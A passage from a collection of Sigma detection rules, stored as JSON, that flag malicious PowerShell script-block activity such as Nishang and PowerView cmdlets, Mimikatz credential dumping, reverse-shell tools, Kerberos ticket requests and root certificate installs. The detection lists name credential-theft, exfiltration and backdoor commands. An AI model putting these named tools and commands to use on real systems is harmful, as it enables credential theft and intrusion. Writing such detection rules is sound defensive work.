    "content": "title: Live Memory Dump Using Powershell\nid: cd185561-4760-45d6-a63e-a51325112cae\nstatus: test\ndescription: Detects usage of a PowerShell command to dump the live memory of a Windows machine\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2022-ps\nauthor: Max Altgelt (Nextron Systems)\ndate: 2021-09-21\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Get-StorageDiagnosticInfo'\n            - '-IncludeLiveDump'\n    condition: selection\nfalsepositives:\n    - Diagnostics\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml",
    "content": "title: Modify Group Policy Settings - ScriptBlockLogging\nid: b7216a7d-687e-4c8d-82b1-3080b2ad961f\nrelated:\n    - id: ada4b0c4-758b-46ac-9033-9004613a150d\n      type: similar\nstatus: test\ndescription: Detect malicious GPO modifications can be used to implement many other malicious behaviors.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md\nauthor: frack113\ndate: 2022-08-19\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_path:\n        ScriptBlockText|contains: \\SOFTWARE\\Policies\\Microsoft\\Windows\\System\n    selection_key:\n        ScriptBlockText|contains:\n            - GroupPolicyRefreshTimeDC\n            - GroupPolicyRefreshTimeOffsetDC\n            - GroupPolicyRefreshTime\n            - GroupPolicyRefreshTimeOffset\n            - EnableSmartScreen\n            - ShellSmartScreenLevel\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml",
    "content": "title: Powershell MsXml COM Object\nid: 78aa1347-1517-4454-9982-b338d6df8343\nstatus: test\ndescription: |\n    Adversaries may abuse PowerShell commands and scripts for execution.\n    PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\n    Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt\n    - https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)\n    - https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\nauthor: frack113, MatilJ\ndate: 2022-01-19\nmodified: 2022-05-19\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'New-Object'\n            - '-ComObject'\n            - 'MsXml2.'\n            - 'XmlHttp'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml",
    "content": "title: Malicious Nishang PowerShell Commandlets\nid: f772cee9-b7c2-4cb2-8f07-49870adc02e0\nstatus: test\ndescription: Detects Commandlet names and arguments from the Nishang exploitation framework\nreferences:\n    - https://github.com/samratashok/nishang\nauthor: Alec Costello\ndate: 2019-05-16\nmodified: 2023-01-16\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Add-ConstrainedDelegationBackdoor'\n            # - 'Add-Persistence' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            # - 'Add-RegBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            # - 'Add-ScrnSaveBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            - 'Copy-VSS'\n            - 'Create-MultipleSessions'\n            - 'DataToEncode'\n            - 'DNS_TXT_Pwnage'\n            - 'Do-Exfiltration-Dns'\n            - 'Download_Execute'\n            - 'Download-Execute-PS'\n            - 'DownloadAndExtractFromRemoteRegistry'\n            - 'DumpCerts'\n            - 'DumpCreds'\n            - 'DumpHashes'\n            - 'Enable-DuplicateToken'\n            - 'Enable-Duplication'\n            - 'Execute-Command-MSSQL'\n            - 'Execute-DNSTXT-Code'\n            - 'Execute-OnTime'\n            - 'ExetoText'\n            - 'exfill'\n            - 'ExfilOption'\n            - 'FakeDC'\n            - 'FireBuster'\n            - 'FireListener'\n            - 'Get-Information ' # Space at the end is required. Otherwise, we get FP with Get-InformationBarrierReportDetails or Get-InformationBarrierReportSummary\n            # - 'Get-PassHashes' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            - 'Get-PassHints'\n            - 'Get-Web-Credentials'\n            - 'Get-WebCredentials'\n            - 'Get-WLAN-Keys'\n            # - 'Gupt-Backdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            - 'HTTP-Backdoor'\n            # - 'Invoke-ADSBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            - 'Invoke-AmsiBypass'\n            - 'Invoke-BruteForce'\n            - 'Invoke-CredentialsPhish'\n            - 'Invoke-Decode'\n            - 'Invoke-Encode'\n            - 'Invoke-Interceptor'\n            - 'Invoke-JSRatRegsvr'\n            - 'Invoke-JSRatRundll'\n            - 'Invoke-MimikatzWDigestDowngrade'\n            - 'Invoke-NetworkRelay'\n            # - 'Invoke-PortScan' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            # - 'Invoke-PoshRatHttp' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            - 'Invoke-PowerShellIcmp'\n            - 'Invoke-PowerShellUdp'\n            - 'Invoke-Prasadhak'\n            - 'Invoke-PSGcat'\n            - 'Invoke-PsGcatAgent'\n            # - 'Invoke-PsUACme' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            - 'Invoke-SessionGopher'\n            - 'Invoke-SSIDExfil'\n            # - Jitter  # Prone to FPs\n            # - 'Keylogger' # Too generic to be linked to Nishang\n            - 'LoggedKeys'\n            - 'Nishang'\n            - 'NotAllNameSpaces' # This is param to \"Set-RemoteWMI\"\n            - 'Out-CHM'\n            - 'OUT-DNSTXT'\n            - 'Out-HTA'\n            - 'Out-RundllCommand'\n            - 'Out-SCF'\n            - 'Out-SCT'\n            - 'Out-Shortcut'\n            - 'Out-WebQuery'\n            - 'Out-Word'\n            - 'Parse_Keys'\n            - 'Password-List'\n            - 'Powerpreter'\n            - 'Remove-Persistence'\n            - 'Remove-PoshRat'\n            - 'Remove-Update'\n            - 'Run-EXEonRemote'\n            - 'Set-DCShadowPermissions'\n            - 'Set-RemotePSRemoting'\n            - 'Set-RemoteWMI'\n            - 'Shellcode32'\n            - 'Shellcode64'\n            - 'StringtoBase64'\n            - 'TexttoExe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml",
    "content": "title: NTFS Alternate Data Stream\nid: 8c521530-5169-495d-a199-0a3a881ad24e\nstatus: test\ndescription: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.\nreferences:\n    - https://web.archive.org/web/20220614030603/http://www.powertheshell.com/ntfsstreams/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md\nauthor: Sami Ruohonen\ndate: 2018-07-24\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_content:\n        ScriptBlockText|contains:\n            - set-content\n            - add-content\n    selection_stream:\n        ScriptBlockText|contains: '-stream'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml",
    "content": "title: Code Executed Via Office Add-in XLL File\nid: 36fbec91-fa1b-4d5d-8df1-8d8edcb632ad\nstatus: test\ndescription: |\n    Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\n    Office add-ins can be used to add functionality to Office programs\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md\nauthor: frack113\ndate: 2021-12-28\ntags:\n    - attack.persistence\n    - attack.t1137.006\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'new-object '\n            - '-ComObject '\n            - '.application'\n            - '.RegisterXLL'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_packet_capture.yml",
    "content": "title: Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock\nid: da34e323-1e65-42db-83be-a6725ac2caa3\nstatus: test\ndescription: |\n    Detects the execution of powershell scripts with calls to the \"Start-NetEventSession\" cmdlet. Which allows an attacker to start event and packet capture for a network event session.\n    Adversaries may attempt to capture network to gather information over the course of an operation.\n    Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/5f866ca4517e837c4ea576e7309d0891e78080a8/atomics/T1040/T1040.md#atomic-test-16---powershell-network-sniffing\n    - https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/7b8935fe4c82cb64d61343de1a8b2e38dd968534/handbooks/10_post_exploitation.md\n    - https://github.com/forgottentq/powershell/blob/9e616363d497143dc955c4fdce68e5c18d28a6cb/captureWindows-Endpoint.ps1#L13\nauthor: frack113\ndate: 2024-05-12\ntags:\n    - attack.credential-access\n    - attack.discovery\n    - attack.t1040\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'Start-NetEventSession'\n    condition: selection\nfalsepositives:\n    - Legitimate network diagnostic scripts.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml",
    "content": "title: Potential Invoke-Mimikatz PowerShell Script\nid: 189e3b02-82b2-4b90-9662-411eb64486d4\nstatus: test\ndescription: Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-28\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    category: ps_script\n    product: windows\ndetection:\n    selection_1:\n        ScriptBlockText|contains|all:\n            - 'DumpCreds'\n            - 'DumpCerts'\n    selection_2:\n        ScriptBlockText|contains: 'sekurlsa::logonpasswords'\n    selection_3:\n        ScriptBlockText|contains|all:\n            - 'crypto::certificates'\n            - 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\n    condition: 1 of selection*\nfalsepositives:\n    - Mimikatz can be useful for testing the security of networks\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_potential_unconstrained_delegation_discovery.yml",
    "content": "title: Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock\nid: cdfa73b6-3c9d-4bb8-97f8-ddbd8921f5c5\nstatus: experimental\ndescription: Detects the use of the \"Get-ADComputer\" cmdlet in order to identify systems which are configured for unconstrained delegation.\nreferences:\n    - https://pentestlab.blog/2022/03/21/unconstrained-delegation/\n    - https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer?view=windowsserver2022-ps\nauthor: frack113\ndate: 2025-03-05\ntags:\n    - attack.reconnaissance\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1018\n    - attack.t1558\n    - attack.t1589.002\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enable'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - '-Properties*TrustedForDelegation'\n            - '-Properties*TrustedToAuthForDelegation'\n            - '-Properties*msDS-AllowedToDelegateTo'\n            - '-Properties*PrincipalsAllowedToDelegateToAccount'\n            - '-LDAPFilter*(userAccountControl:1.2.840.113556.1.4.803:=524288)'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the library for administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_powershell_web_access_installation.yml",
    "content": "title: PowerShell Web Access Installation - PsScript\nid: 5f9c7f1a-7c21-4c39-b2f3-8d8006e0e51f\nstatus: test\ndescription: Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse\nreferences:\n    - https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a\n    - https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41\nauthor: Michael Haag\ndate: 2024-09-03\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_install:\n        ScriptBlockText|contains: 'Install-WindowsFeature WindowsPowerShellWebAccess'\n    selection_config:\n        ScriptBlockText|contains: 'Install-PswaWebApplication'\n    selection_auth:\n        ScriptBlockText|contains|all:\n            - 'Add-PswaAuthorizationRule'\n            - '-UserName *'\n            - '-ComputerName *'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate PowerShell Web Access installations by administrators\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml",
    "content": "title: PowerView PowerShell Cmdlets - ScriptBlock\nid: dcd74b95-3f36-4ed9-9598-0490951643aa\nrelated:\n    - id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d\n      type: similar\nstatus: test\ndescription: Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.\nreferences:\n    - https://powersploit.readthedocs.io/en/stable/Recon/README\n    - https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon\n    - https://thedfirreport.com/2020/10/08/ryuks-return\n    - https://adsecurity.org/?p=2277\nauthor: Bhabesh Raj\ndate: 2021-05-18\nmodified: 2023-11-22\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Export-PowerViewCSV'\n            - 'Find-DomainLocalGroupMember'\n            - 'Find-DomainObjectPropertyOutlier'\n            - 'Find-DomainProcess'\n            - 'Find-DomainShare'\n            - 'Find-DomainUserEvent'\n            - 'Find-DomainUserLocation'\n            - 'Find-ForeignGroup'\n            - 'Find-ForeignUser'\n            - 'Find-GPOComputerAdmin'\n            - 'Find-GPOLocation'\n            - 'Find-InterestingDomain' # Covers: Find-InterestingDomainAcl, Find-InterestingDomainShareFile\n            - 'Find-InterestingFile'\n            - 'Find-LocalAdminAccess'\n            - 'Find-ManagedSecurityGroups'\n            - 'Get-CachedRDPConnection'\n            - 'Get-DFSshare'\n            - 'Get-DomainDFSShare'\n            - 'Get-DomainDNSRecord'\n            - 'Get-DomainDNSZone'\n            - 'Get-DomainFileServer'\n            - 'Get-DomainGPOComputerLocalGroupMapping'\n            - 'Get-DomainGPOLocalGroup'\n            - 'Get-DomainGPOUserLocalGroupMapping'\n            - 'Get-LastLoggedOn'\n            - 'Get-LoggedOnLocal'\n            - 'Get-NetFileServer'\n            - 'Get-NetForest' # Covers: Get-NetForestCatalog, Get-NetForestDomain, Get-NetForestTrust\n            - 'Get-NetGPOGroup'\n            - 'Get-NetProcess'\n            - 'Get-NetRDPSession'\n            - 'Get-RegistryMountedDrive'\n            - 'Get-RegLoggedOn'\n            - 'Get-WMIRegCachedRDPConnection'\n            - 'Get-WMIRegLastLoggedOn'\n            - 'Get-WMIRegMountedDrive'\n            - 'Get-WMIRegProxy'\n            - 'Invoke-ACLScanner'\n            - 'Invoke-CheckLocalAdminAccess'\n            - 'Invoke-EnumerateLocalAdmin'\n            - 'Invoke-EventHunter'\n            - 'Invoke-FileFinder'\n            - 'Invoke-Kerberoast'\n            - 'Invoke-MapDomainTrust'\n            - 'Invoke-ProcessHunter'\n            - 'Invoke-RevertToSelf'\n            - 'Invoke-ShareFinder'\n            - 'Invoke-UserHunter'\n            - 'Invoke-UserImpersonation'\n            - 'Remove-RemoteConnection'\n            - 'Request-SPNTicket'\n            - 'Resolve-IPAddress'\n            # - 'Get-ADObject'  # prone to FPs\n            # - 'Get-Domain'  # too many FPs  # Covers Cmdlets like: DomainComputer, DomainController, DomainDFSShare, DomainDNSRecord, DomainGPO, etc.\n            # - 'Add-DomainGroupMember'\n            # - 'Add-DomainObjectAcl'\n            # - 'Add-ObjectAcl'\n            # - 'Add-RemoteConnection'\n            # - 'Convert-ADName'\n            # - 'Convert-NameToSid'\n            # - 'ConvertFrom-UACValue'\n            # - 'ConvertTo-SID'\n            # - 'Get-DNSRecord'\n            # - 'Get-DNSZone'\n            # - 'Get-DomainComputer'\n            # - 'Get-DomainController'\n            # - 'Get-DomainGroup'\n            # - 'Get-DomainGroupMember'\n            # - 'Get-DomainManagedSecurityGroup'\n            # - 'Get-DomainObject'\n            # - 'Get-DomainObjectAcl'\n            # - 'Get-DomainOU'\n            # - 'Get-DomainPolicy'\n            # - 'Get-DomainSID'\n            # - 'Get-DomainSite'\n            # - 'Get-DomainSPNTicket'\n            # - 'Get-DomainSubnet'\n            # - 'Get-DomainUser'\n            # - 'Get-DomainUserEvent'\n            # - 'Get-Forest' # Covers: Get-ForestDomain, Get-ForestGlobalCatalog, Get-ForestTrust\n            # - 'Get-IPAddress'\n            # - 'Get-NetComputer' # Covers: Get-NetComputerSiteName\n            # - 'Get-NetDomain' # Covers: Get-NetDomainController, Get-NetDomainTrust\n            # - 'Get-NetGroup' # Covers: Get-NetGroupMember\n            # - 'Get-NetLocalGroup' # Covers: NetLocalGroupMember\n            # - 'Get-NetLoggedon'\n            # - 'Get-NetOU'\n            # - 'Get-NetSession'\n            # - 'Get-NetShare'\n            # - 'Get-NetSite'\n            # - 'Get-NetSubnet'\n            # - 'Get-NetUser'\n            # - 'Get-ObjectAcl'\n            # - 'Get-PathAcl'\n            # - 'Get-Proxy'\n            # - 'Get-SiteName'\n            # - 'Get-UserEvent'\n            # - 'Get-WMIProcess'\n            # - 'New-DomainGroup'\n            # - 'New-DomainUser'\n            # - 'Set-ADObject'\n            # - 'Set-DomainObject'\n            # - 'Set-DomainUserPassword'\n            # - 'Test-AdminAccess'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml",
    "content": "title: PowerShell Credential Prompt\nid: ca8b77a9-d499-4095-b793-5d5f330d450e\nstatus: test\ndescription: Detects PowerShell calling a credential prompt\nreferences:\n    - https://twitter.com/JohnLaTwC/status/850381440629981184\n    - https://t.co/ezOTGy1a1G\nauthor: John Lambert (idea), Florian Roth (Nextron Systems)\ndate: 2017-04-09\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'PromptForCredential'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml",
    "content": "title: PSAsyncShell - Asynchronous TCP Reverse Shell\nid: afd3df04-948d-46f6-ae44-25966c44b97f\nstatus: test\ndescription: Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell\nreferences:\n    - https://github.com/JoelGMSec/PSAsyncShell\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-04\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'PSAsyncShell'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_psattack.yml",
    "content": "title: PowerShell PSAttack\nid: b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5\nstatus: test\ndescription: Detects the use of PSAttack PowerShell hack tool\nreferences:\n    - https://adsecurity.org/?p=2921\nauthor: Sean Metcalf (source), Florian Roth (Nextron Systems)\ndate: 2017-03-05\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'PS ATTACK!!!'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml",
    "content": "title: PowerShell Remote Session Creation\nid: a0edd39f-a0c6-4c17-8141-261f958e8d8f\nstatus: test\ndescription: |\n    Adversaries may abuse PowerShell commands and scripts for execution.\n    PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.4\nauthor: frack113\ndate: 2022-01-06\nmodified: 2023-01-02\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'New-PSSession'\n            - '-ComputerName '\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml",
    "content": "title: Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock\nid: cacef8fc-9d3d-41f7-956d-455c6e881bc5\nrelated:\n    - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation\n      type: similar\n    - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic\n      type: similar\n    - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module\n      type: similar\nstatus: test\ndescription: Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection:\n        ScriptBlockText|startswith: 'function Get-VMRemoteFXPhysicalVideoAdapter {'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml",
    "content": "title: Suspicious Kerberos Ticket Request via PowerShell Script - ScriptBlock\nid: a861d835-af37-4930-bcd6-5b178bfb54df\nrelated:\n    - id: caa9a802-8bd8-4b9e-a5cd-4d6221670219\n      type: similar\nstatus: test\ndescription: |\n    Detects PowerShell scripts that utilize native PowerShell Identity modules to request Kerberos tickets.\n    This behavior is typically seen during a Kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell\n    - https://learn.microsoft.com/en-us/dotnet/api/system.identitymodel.tokens.kerberosrequestorsecuritytoken?view=netframework-4.8.1\nauthor: frack113\ndate: 2021-12-28\nmodified: 2025-11-18\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'System.IdentityModel.Tokens.KerberosRequestorSecurityToken'\n            - '.GetRequest()'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml",
    "content": "title: PowerShell Script With File Hostname Resolving Capabilities\nid: fbc5e92f-3044-4e73-a5c6-1c4359b539de\nstatus: test\ndescription: Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.\nreferences:\n    - https://www.fortypoundhead.com/showcontent.asp?artid=24022\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-05\ntags:\n    - attack.exfiltration\n    - attack.t1020\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Get-content '\n            - 'foreach'\n            - '[System.Net.Dns]::GetHostEntry'\n            - 'Out-File'\n    condition: selection\nfalsepositives:\n    - The same functionality can be implemented by admin scripts, correlate with name and creator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml",
    "content": "title: Root Certificate Installed - PowerShell\nid: 42821614-9264-4761-acfc-5772c3286f76\nstatus: test\ndescription: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md\nauthor: 'oscd.community, @redcanary, Zach Stanford @svch0st'\ndate: 2020-10-10\nmodified: 2022-12-02\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection1:\n        ScriptBlockText|contains|all:\n            - 'Move-Item'\n            - 'Cert:\\LocalMachine\\Root'\n    selection2:\n        ScriptBlockText|contains|all:\n            - 'Import-Certificate'\n            - 'Cert:\\LocalMachine\\Root'\n    condition: 1 of selection*\nfalsepositives:\n    - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml",
    "content": "title: Suspicious Invoke-Item From Mount-DiskImage\nid: 902cedee-0398-4e3a-8183-6f3a89773a96\nstatus: test\ndescription: Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso\n    - https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps\nauthor: frack113\ndate: 2022-02-01\ntags:\n    - attack.defense-evasion\n    - attack.t1553.005\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Mount-DiskImage '\n            - '-ImagePath '\n            - Get-Volume\n            - '.DriveLetter'\n            - 'invoke-item '\n            - '):\\'\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml",
